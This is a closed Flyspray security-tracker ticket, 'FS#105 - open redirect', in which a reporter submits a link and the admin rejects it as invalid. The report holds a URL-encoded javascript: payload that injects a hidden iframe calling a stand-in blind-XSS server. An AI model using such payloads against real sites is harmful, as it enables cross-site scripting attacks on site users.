Security vulnerabilities

  • Status Closed
  • Assigned To No-one
  • Private
Attached to Project: Security vulnerabilities
Opened by sabeesh - 24.11.2024
Last edited by cbay - 25.11.2024

FS#105 - open redirect

Closed by  cbay
25.11.2024 08:20
Reason for closing:  Invalid
<a href="javascript:(function()%7Bvar%20i%3Ddocument.createElement('iframe')%3Bi.src%3D'https%3A%2F%2Fyour-bxss-server.example.com'%3Bi.style.display%3D'none'%3Bdocument.body.appendChild(i)%7D)()">Click me</a>

the user when he clicks the link gets redirect to the page without any warning for example https://evil.com

Admin
cbay commented on 25.11.2024 08:18

Hello,

We I click on your link, I go to https://example.com.

Anyway, we run the latest version of Flyspray, if you feel there's a vulnerability here you should report it to them.

Kind regards,
Cyril

Loading...

Available keyboard shortcuts

Tasklist

Task Details

Task Editing